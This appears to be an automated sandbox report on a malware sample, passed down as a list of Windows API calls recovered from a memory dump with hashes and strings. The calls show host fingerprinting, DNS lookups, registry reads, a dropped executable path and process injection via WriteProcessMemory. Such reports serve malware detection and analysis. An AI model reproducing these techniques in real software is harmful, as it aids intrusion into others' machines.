                                                                                        • Instruction ID: 1ed8ec1eb73a02134d697423bcc75af05385e0873aef64235bb5f62b8049b9cc
                                                                                        • Opcode Fuzzy Hash: a61ce7807bd8ccd9f2ceb6372a55763db17dc71534fa371650b4f363ac86114d
                                                                                        • Instruction Fuzzy Hash: 32317A76905219AFDB10EFA4DC84AEE7BBCEF8C314F104166FA15E3140E7709A818BA0
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 030F4070
                                                                                        • ExitProcess.KERNEL32 ref: 030F4121
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateEventExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2404124870-0
                                                                                        • Opcode ID: d1a510f80c2385556d38d669575a2293ae2aa0287b59e31cd0e59e3d98a6b566
                                                                                        • Instruction ID: 269b60f3c5a8789e013b2c0ee1a404a1c64bd13158fd5410b6937e98dd72eecd
                                                                                        • Opcode Fuzzy Hash: d1a510f80c2385556d38d669575a2293ae2aa0287b59e31cd0e59e3d98a6b566
                                                                                        • Instruction Fuzzy Hash: 1D5191B5D01219BFEB20EAA68D45FFFBABCEF59754F040065FB00A6480E7708A45C7A1
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,759223A0,?,00000000,030F2F01,?,030F20FF,03102000), ref: 030F2D3A
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 030F2D4A
                                                                                        • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 030F2D61
                                                                                        • DnsQuery_A.DNSAPI(00000000,0000000F,00000000,00000000,?,00000000), ref: 030F2D77
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 030F2D99
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 030F2DA0
                                                                                        • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 030F2DCB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcessQuery_lstrcpyn
                                                                                        • String ID: DnsQuery_A$dnsapi.dll
                                                                                        • API String ID: 233223969-3847274415
                                                                                        • Opcode ID: 0697783be81f15f33577fe29c76d4bd1ec21afee390abed4f956c3dea097c7f3
                                                                                        • Instruction ID: abb36fb52f4021de1afcc0ea51101453871da6562191367ebf54925f888f9c3c
                                                                                        • Opcode Fuzzy Hash: 0697783be81f15f33577fe29c76d4bd1ec21afee390abed4f956c3dea097c7f3
                                                                                        • Instruction Fuzzy Hash: C2218E75902625AFCB22DF64DC44AAEBBBCEF0CB54F054851FA05EB504D7B0998187E0
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 030F815F
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,030FA45F,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 030F8187
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,030FA45F,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 030F81BE
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 030F8210
                                                                                          • Part of subcall function 030F675C: SetFileAttributesA.KERNEL32(?,00000080,?,75920F10,00000000), ref: 030F677E
                                                                                          • Part of subcall function 030F675C: CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,75920F10,00000000), ref: 030F679A
                                                                                          • Part of subcall function 030F675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,75920F10,00000000), ref: 030F67B0
                                                                                          • Part of subcall function 030F675C: SetFileAttributesA.KERNEL32(?,00000002,?,75920F10,00000000), ref: 030F67BF
                                                                                          • Part of subcall function 030F675C: GetFileSize.KERNEL32(000000FF,00000000,?,75920F10,00000000), ref: 030F67D3
                                                                                          • Part of subcall function 030F675C: ReadFile.KERNELBASE(000000FF,?,00000040,030F8244,00000000,?,75920F10,00000000), ref: 030F6807
                                                                                          • Part of subcall function 030F675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 030F681F
                                                                                          • Part of subcall function 030F675C: ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,75920F10,00000000), ref: 030F683E
                                                                                          • Part of subcall function 030F675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 030F685C
                                                                                          • Part of subcall function 030FEC2E: GetProcessHeap.KERNEL32(00000000,030FEA27,00000000,030FEA27,00000000), ref: 030FEC41
                                                                                          • Part of subcall function 030FEC2E: RtlFreeHeap.NTDLL(00000000), ref: 030FEC48
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                        • String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe
                                                                                        • API String ID: 124786226-2650950432
                                                                                        • Opcode ID: a1080ce91ce78089ebe275093811a2594044ce2df9bc81520ba7ba01844c5fa4
                                                                                        • Instruction ID: 89e032de00ecbbdc5fb4c24bc837504ae37ac6d42a5ed0c56d7f039ed1df4fc9
                                                                                        • Opcode Fuzzy Hash: a1080ce91ce78089ebe275093811a2594044ce2df9bc81520ba7ba01844c5fa4
                                                                                        • Instruction Fuzzy Hash: 9641B975902209BFEB54FB94DD84DFE77BCEB08304F14886AE701E6404E671AA85CB61
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 030F1AD4
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 030F1AE9
                                                                                        • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 030F1B20
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AdaptersAddressAddressesLibraryLoadProc
                                                                                        • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                        • API String ID: 3646706440-1087626847
                                                                                        • Opcode ID: be144b6bbf978b857318f9eec703a728c85bf3f1f2a363e8ea5d6a45ad743bde
                                                                                        • Instruction ID: c9a68f72355302e077854085e26327dc67e91228e50bc39ca824a62790babb73
                                                                                        • Opcode Fuzzy Hash: be144b6bbf978b857318f9eec703a728c85bf3f1f2a363e8ea5d6a45ad743bde
                                                                                        • Instruction Fuzzy Hash: 6911D375E03228FFCB59DBA4CC84CEEFBFAEB48B10B184096E215E7544E6704A40CB90
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,030FE5F2,00000000,00020119,030FE5F2,031022F8), ref: 030FE3E6
                                                                                        • RegQueryValueExA.ADVAPI32(030FE5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 030FE44E
                                                                                        • RegQueryValueExA.ADVAPI32(030FE5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 030FE482
                                                                                        • RegQueryValueExA.ADVAPI32(030FE5F2,?,00000000,?,80000001,?), ref: 030FE4CF
                                                                                        • RegCloseKey.ADVAPI32(030FE5F2,?,?,?,?,000000C8,000000E4), ref: 030FE520
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1586453840-0
                                                                                        • Opcode ID: 536c89608dc75d9a61838e0a3afad5bcaae2c9fcf61e5441204a4ea51e941094
                                                                                        • Instruction ID: 3f23db629d4bc14e7b6c17f5b8a8b1c59d4a2c7e1a2e30546317bea6c3ebd5e6
                                                                                        • Opcode Fuzzy Hash: 536c89608dc75d9a61838e0a3afad5bcaae2c9fcf61e5441204a4ea51e941094
                                                                                        • Instruction Fuzzy Hash: 894136B6D0021DAFEF11EF98DC84DEEBBBDFB08244F144466EA10A6560E3719A55CB60
                                                                                        APIs
                                                                                        • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 030FF2A0
                                                                                        • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 030FF2C0
                                                                                        • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 030FF2DD
                                                                                        • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 030FF2EC
                                                                                        • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 030FF2FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: setsockopt
                                                                                        • String ID:
                                                                                        • API String ID: 3981526788-0
                                                                                        • Opcode ID: 49efab75608c8959709b13be584038fa02a9640ebdefe6fd9df5de26ff72c61a
                                                                                        • Instruction ID: 069329536af65fc76d6aa68573daa77b064b4de1be99a3e96d745a355697a267
                                                                                        • Opcode Fuzzy Hash: 49efab75608c8959709b13be584038fa02a9640ebdefe6fd9df5de26ff72c61a
                                                                                        • Instruction Fuzzy Hash: FD110AB2A40248BAEF11DF94CD81FDE7FBDEB44751F008066BB04EA1D0E6B19A44CB94
                                                                                        APIs
                                                                                          • Part of subcall function 030F1AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 030F1AD4
                                                                                          • Part of subcall function 030F1AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 030F1AE9
                                                                                          • Part of subcall function 030F1AC3: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 030F1B20
                                                                                        • GetComputerNameA.KERNEL32(?,0000000F), ref: 030F1C15
                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 030F1C51
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AdaptersAddressAddressesComputerInformationLibraryLoadNameProcVolume
                                                                                        • String ID: hi_id$localcfg
                                                                                        • API String ID: 2794401326-2393279970
                                                                                        • Opcode ID: fe5e74660f1b6fcbe43d43993dcdda1ec89d09624d6c10c71686a79de47f7321
                                                                                        • Instruction ID: a1ac73b25b8a0b1019764c33e06d65e2a100d10d31b2cf3876cef5cc306e3298
                                                                                        • Opcode Fuzzy Hash: fe5e74660f1b6fcbe43d43993dcdda1ec89d09624d6c10c71686a79de47f7321
                                                                                        • Instruction Fuzzy Hash: 19018076A01118FFEB58DAE8C8C59EFBABCAB48785F140475E702E3500D6709E4486A0
                                                                                        APIs
                                                                                          • Part of subcall function 030F1AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 030F1AD4
                                                                                          • Part of subcall function 030F1AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 030F1AE9
                                                                                          • Part of subcall function 030F1AC3: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 030F1B20
                                                                                        • GetComputerNameA.KERNEL32(?,0000000F), ref: 030F1BA3
                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,030F1EFD,00000000,00000000,00000000,00000000), ref: 030F1BB8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AdaptersAddressAddressesComputerInformationLibraryLoadNameProcVolume
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 2794401326-1857712256
                                                                                        • Opcode ID: 97a631e6780fbbc2d4a58f50c3282be8f06e7beb44706f28815f174bd3f5462e
                                                                                        • Instruction ID: fd93d5a5498a39cdc2c1543ba36c9521c6c6b897ab008a1593811f2f5152d6e8
                                                                                        • Opcode Fuzzy Hash: 97a631e6780fbbc2d4a58f50c3282be8f06e7beb44706f28815f174bd3f5462e
                                                                                        • Instruction Fuzzy Hash: 1B014BB6D0110CFFEB00DAE9C8819EFFABCAB88654F150562A701E7140D5709E0887F0
                                                                                        APIs
                                                                                        • inet_addr.WS2_32(00000001), ref: 030F2693
                                                                                        • gethostbyname.WS2_32(00000001), ref: 030F269F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbynameinet_addr
                                                                                        • String ID: time_cfg
                                                                                        • API String ID: 1594361348-2401304539
                                                                                        • Opcode ID: 53716edb4c5f536332cd71b90e0ce27ee5c2bddd3db8fc88839e8039cd73e5dd
                                                                                        • Instruction ID: 59a39f71c20b938829cfe68a4a69074063bb89dd3bc4d5e5333c6077c445d210
                                                                                        • Opcode Fuzzy Hash: 53716edb4c5f536332cd71b90e0ce27ee5c2bddd3db8fc88839e8039cd73e5dd
                                                                                        • Instruction Fuzzy Hash: 86E0C2342050118FDB90EB28F444BC577ECEF4E230F0A4980F540C3194CB70D8C08790
                                                                                        APIs
                                                                                          • Part of subcall function 030FDD05: GetTickCount.KERNEL32 ref: 030FDD0F
                                                                                          • Part of subcall function 030FDD05: InterlockedExchange.KERNEL32(031036B4,00000001), ref: 030FDD44
                                                                                          • Part of subcall function 030FDD05: GetCurrentThreadId.KERNEL32 ref: 030FDD53
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,75920F10,?,00000000,?,030FA445), ref: 030FE558
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,75920F10,?,00000000,?,030FA445), ref: 030FE583
                                                                                        • CloseHandle.KERNEL32(00000000,?,75920F10,?,00000000,?,030FA445), ref: 030FE5B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCountCurrentExchangeHandleInterlockedReadSizeThreadTick
                                                                                        • String ID:
                                                                                        • API String ID: 3683885500-0
                                                                                        • Opcode ID: 658c8c843521ececa4cdc41abed4697d7a48672a9d790330e900ef7099734f9c
                                                                                        • Instruction ID: 39103c7537f2557e6b60e29d33974ec68d65190ff6b62527f005bc71c294104f
                                                                                        • Opcode Fuzzy Hash: 658c8c843521ececa4cdc41abed4697d7a48672a9d790330e900ef7099734f9c
                                                                                        • Instruction Fuzzy Hash: F5213AB9A423047FE164F6229C09FFF794CDBD8B54F000414BB09A95DAEAA5D500C1B1
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000003E8), ref: 030F88A5
                                                                                          • Part of subcall function 030FF04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,030FE342,00000000,7508EA50,80000001,00000000,030FE513,?,00000000,00000000,?,000000E4), ref: 030FF089
                                                                                          • Part of subcall function 030FF04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,030FE342,00000000,7508EA50,80000001,00000000,030FE513,?,00000000,00000000,?,000000E4,000000C8), ref: 030FF093
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$FileSystem$Sleep
                                                                                        • String ID: localcfg$rresolv
                                                                                        • API String ID: 1561729337-486471987
                                                                                        • Opcode ID: 8f3e9c5e3df4bc99d33c2e63df6b9a65d19b3950f22f67500b8a5ac6b69179da
                                                                                        • Instruction ID: e2b6668a753134018888546f8bcaa1b72e0973f05df8d0910bc519b906d7364d
                                                                                        • Opcode Fuzzy Hash: 8f3e9c5e3df4bc99d33c2e63df6b9a65d19b3950f22f67500b8a5ac6b69179da
                                                                                        • Instruction Fuzzy Hash: 2A21F73554A3016FF318F764AC46BEE3AD8AB89754F644819F708998C0EFF5858181B2
                                                                                        APIs
                                                                                        • CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,031022F8,030F42B6,00000000,00000001,031022F8,00000000,?,030F98FD), ref: 030F4021
                                                                                        • GetLastError.KERNEL32(?,030F98FD,00000001,00000100,031022F8,030FA3C7), ref: 030F402C
                                                                                        • Sleep.KERNEL32(000001F4,?,030F98FD,00000001,00000100,031022F8,030FA3C7), ref: 030F4046
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateErrorFileLastSleep
                                                                                        • String ID:
                                                                                        • API String ID: 408151869-0
                                                                                        • Opcode ID: db15b71f9c3a67e76354e6947c62b62c92c501d8313c15c2e4e80c94861a3309
                                                                                        • Instruction ID: a8dce3bf91c1f455d5f16fda8a5894da591da64050e92fe6c7e5c5373e573803
                                                                                        • Opcode Fuzzy Hash: db15b71f9c3a67e76354e6947c62b62c92c501d8313c15c2e4e80c94861a3309
                                                                                        • Instruction Fuzzy Hash: B4F0A0322412016FE7759B2AAC49B6F72A5EB8A724F2D4B24F7B6E24D4C67044C19F24
                                                                                        APIs
                                                                                        • GetEnvironmentVariableA.KERNEL32(030FDC19,?,00000104), ref: 030FDB7F
                                                                                        • lstrcpyA.KERNEL32(?,031028F8), ref: 030FDBA4
                                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000080,00000000), ref: 030FDBC2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateEnvironmentFileVariablelstrcpy
                                                                                        • String ID:
                                                                                        • API String ID: 2536392590-0
                                                                                        • Opcode ID: f421360448f7b76d690e53df83d26dd556521098b2f02561d45a75e36aaf07c7
                                                                                        • Instruction ID: 45977efec76b17feb1a0394ec268e7ff4bb81e07356776f2403402fb919a4bc6
                                                                                        • Opcode Fuzzy Hash: f421360448f7b76d690e53df83d26dd556521098b2f02561d45a75e36aaf07c7
                                                                                        • Instruction Fuzzy Hash: 25F09070100249ABEF10EF64DD49FE93BA9AB08348F104194BB51A40D4D7F2D585CB20
                                                                                        APIs
                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 030FEC5E
                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 030FEC72
                                                                                        • GetTickCount.KERNEL32 ref: 030FEC78
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$CountFileInformationSystemTickVolume
                                                                                        • String ID:
                                                                                        • API String ID: 1209300637-0
                                                                                        • Opcode ID: f7df6b5c6174dd33a683fdb1216c61bb02de65034d4a42df8d45735b9c3adb80
                                                                                        • Instruction ID: 91a154379f400d7b444c05bb16259f208c43a8d018144abf3d830725c8ee5537
                                                                                        • Opcode Fuzzy Hash: f7df6b5c6174dd33a683fdb1216c61bb02de65034d4a42df8d45735b9c3adb80
                                                                                        • Instruction Fuzzy Hash: 6BE09AF5810108BFE705ABB0DD4AE7B77BCEB0C218F500650B911D6084DAB09A448B70
                                                                                        APIs
                                                                                        • gethostname.WS2_32(?,00000080), ref: 030F30D8
                                                                                        • gethostbyname.WS2_32(?), ref: 030F30E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbynamegethostname
                                                                                        • String ID:
                                                                                        • API String ID: 3961807697-0
                                                                                        • Opcode ID: 005a54dd6950c8af24031a74712457c71a078b2d4396e711555e9b16c9baa9da
                                                                                        • Instruction ID: 8fbe4c51c09f1558677c961a247b1194e96b9aa2dc2f1126165df49a5edc22f0
                                                                                        • Opcode Fuzzy Hash: 005a54dd6950c8af24031a74712457c71a078b2d4396e711555e9b16c9baa9da
                                                                                        • Instruction Fuzzy Hash: 0DE065759011199FCB10EBA8EC85FCA77ECFB0C208F080061FA45E7254EA74E50487A0
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,7FFF0001,80000001,?,030FDB55,7FFF0001), ref: 030FEC13
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,030FDB55,7FFF0001), ref: 030FEC1A
                                                                                          • Part of subcall function 030FEBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,030FEBFE,7FFF0001,?,030FDB55,7FFF0001), ref: 030FEBD3
                                                                                          • Part of subcall function 030FEBCC: RtlAllocateHeap.NTDLL(00000000,?,030FDB55,7FFF0001), ref: 030FEBDA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1357844191-0
                                                                                        • Opcode ID: 886d0811cd8ddae9bc47dd0a232933ea24b4b402a6bee50c71254627d972e01d
                                                                                        • Instruction ID: fcae424812e8d7d163ccaa6d89d8912b3d12666f48cf18abe9ccb76afe43608b
                                                                                        • Opcode Fuzzy Hash: 886d0811cd8ddae9bc47dd0a232933ea24b4b402a6bee50c71254627d972e01d
                                                                                        • Instruction Fuzzy Hash: 80E01A36106618BEDF456B94E808BEA3B59EB48666F108025FB0D89870CB728990DA95
                                                                                        APIs
                                                                                          • Part of subcall function 030FEBA0: GetProcessHeap.KERNEL32(00000000,00000000,030FEC0A,00000000,80000001,?,030FDB55,7FFF0001), ref: 030FEBAD
                                                                                          • Part of subcall function 030FEBA0: HeapSize.KERNEL32(00000000,?,030FDB55,7FFF0001), ref: 030FEBB4
                                                                                        • GetProcessHeap.KERNEL32(00000000,030FEA27,00000000,030FEA27,00000000), ref: 030FEC41
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 030FEC48
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$FreeSize
                                                                                        • String ID:
                                                                                        • API String ID: 1305341483-0
                                                                                        • Opcode ID: a7a8d0ca6c38f6f66894c6d43e4ed2e0fedd725076049f47f4e617e8c79178f0
                                                                                        • Instruction ID: 695e79fd098db5618a6040345063b7c799eac1212aa82ac29c7b8c85a2ec008b
                                                                                        • Opcode Fuzzy Hash: a7a8d0ca6c38f6f66894c6d43e4ed2e0fedd725076049f47f4e617e8c79178f0
                                                                                        • Instruction Fuzzy Hash: 1BC012324077306FC5557650FC0CFDB6B589F4DA11F090409F5056A05487B4988186F1
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,80000001,030FEBFE,7FFF0001,?,030FDB55,7FFF0001), ref: 030FEBD3
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,030FDB55,7FFF0001), ref: 030FEBDA
                                                                                          • Part of subcall function 030FEB74: GetProcessHeap.KERNEL32(00000000,00000000,030FEC28,00000000,?,030FDB55,7FFF0001), ref: 030FEB81
                                                                                          • Part of subcall function 030FEB74: HeapSize.KERNEL32(00000000,?,030FDB55,7FFF0001), ref: 030FEB88
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocateSize
                                                                                        • String ID:
                                                                                        • API String ID: 2559512979-0
                                                                                        • Opcode ID: 7abc6f8dba5136e5d9ecaa075043f823778e677c4d0c7e4b2c80ffa0de72cfaf
                                                                                        • Instruction ID: 8d610beb8756bdcb74f652398f080a2920965763412d22bb5eadc40451a8fa7d
                                                                                        • Opcode Fuzzy Hash: 7abc6f8dba5136e5d9ecaa075043f823778e677c4d0c7e4b2c80ffa0de72cfaf
                                                                                        • Instruction Fuzzy Hash: F3C08C3620A7206BC60537A4FC0CFDB3E98EF8C2A2F040004F609C6164CB708880C7B2
                                                                                        APIs
                                                                                        • recv.WS2_32(000000C8,?,00000000,030FCA44), ref: 030FF476
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: recv
                                                                                        • String ID:
                                                                                        • API String ID: 1507349165-0
                                                                                        • Opcode ID: c92027f51e5a58f7fc07e732ddc9feb171807e3aec2556f2507bb557e020bd93
                                                                                        • Instruction ID: ff317c50b58ab9496d175d120dcbb7f08c84709b7cc0371d1701e18c3a42ee56
                                                                                        • Opcode Fuzzy Hash: c92027f51e5a58f7fc07e732ddc9feb171807e3aec2556f2507bb557e020bd93
                                                                                        • Instruction Fuzzy Hash: B2F0FE7320555AAF9B11EE59DC84CAB7BAEFB8D2507080521FA14D6510D631E8618660
                                                                                        APIs
                                                                                        • closesocket.WS2_32(00000000), ref: 030F1992
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: closesocket
                                                                                        • String ID:
                                                                                        • API String ID: 2781271927-0
                                                                                        • Opcode ID: bb4967a2351f3f88838fc0f50d5bf52387240909cb47c473d2ba53db72bdd513
                                                                                        • Instruction ID: 68df490a39675f8a65ae96e7e0b02398ab5300ffd873a1a60279bb27d77bfce8
                                                                                        • Opcode Fuzzy Hash: bb4967a2351f3f88838fc0f50d5bf52387240909cb47c473d2ba53db72bdd513
                                                                                        • Instruction Fuzzy Hash: 0ED0223610E6326E42043319BC004BFABDCCF4C062701801AFD48C4400CA30C88183E5
                                                                                        APIs
                                                                                        • lstrcmpiA.KERNEL32(80000011,00000000), ref: 030FDDB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 1586166983-0
                                                                                        • Opcode ID: 16434294aa7edbcba57dec8067e01f4bb63905db53bee600dc23dc6968433170
                                                                                        • Instruction ID: d197123415c781c6ac08b36fb354fb912c83a1eef3fb8ca616090aeb0158f368
                                                                                        • Opcode Fuzzy Hash: 16434294aa7edbcba57dec8067e01f4bb63905db53bee600dc23dc6968433170
                                                                                        • Instruction Fuzzy Hash: B2F08C31202312CFCB60CE249984656F3E8EF89329F184D2EE355D2988D770D885CB21
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,030F9816,EntryPoint), ref: 030F638F
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,030F9816,EntryPoint), ref: 030F63A9
                                                                                        • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 030F63CA
                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 030F63EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 1965334864-0
                                                                                        • Opcode ID: 1858364a1cdefbaacc541077bd37e76054551c9f35b0601a5c3a379c44e8c607
                                                                                        • Instruction ID: d775c0a2c415f65370a25941bec87531f366337fd45e3a56d50c7924a43e25f0
